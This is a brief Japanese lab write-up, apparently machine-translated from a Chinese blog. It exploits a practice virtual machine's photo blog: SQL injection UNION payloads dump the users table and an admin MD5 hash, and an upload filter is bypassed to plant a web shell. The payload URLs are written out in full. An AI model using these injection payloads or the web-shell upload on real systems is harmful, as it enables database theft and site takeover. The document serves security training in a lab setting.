実験5



Experiment 5



1.SQLインジェクション

まず、仮想マシンをセットアップします。 kaliで現在のネットワークセグメントをスキャンします。 192.168.1.130の疑わしいIPアドレスを見つけます。



仮想マシンによって提供されるWebページを開きます。ディスカバリーを使用して、SQLインジェクションポイントを作成します。



http://192.168.1.130/cat.php?id=1

http://192.168.1.130/cat.php?id=1 '



order byステートメントを使用して、Webサイトのバックグラウンドデータベーステーブルの列数を試してください。 5で注文すると、ページが正しく報告されません。したがって、クエリには4列の要素が含まれます。

フェデレーションクエリを使用して、Webページの表示ビットを表示します

見つかった2はエコー位置であり、データベースの名前がフォトブログとして見つかりました

http://192.168.1.130/cat.php?id=-2 union select 1、group_concat(table_name)、3,4 from information_schema.tables where table_schema = ‘photoblog’

データベースのテーブルを確認すると、usersテーブルが役立つことがわかります。

http://192.168.1.130/cat.php?id=-2 union select 1、group_concat(column_name)、3,4 from information_schema.columns where table_name = ‘users’

変数名id、login、passwordを使用して、usersテーブルの列名のクエリを続行します

ユーザーテーブルのデータを表示します。id= 1 login = admin password = 8efe310f9ab3efeae8d410a8e0166eb2

http://192.168.138.134/cat.php?id=-1 union select 1、group_concat(id、0x23、login、0x23、password)、3,4 from users

MD5を復号化した後、パスワードP4ssw0rdを取得します

管理者ページにログインします

ファイルをアップロードして、nophpを見つけてください

サフィックス名を変更した後、それをバイパスして正常にアップロードできます。

カタログを入手して包丁でつなぐ

転載:https://www.cnblogs.com/p201521430045/p/8954402.html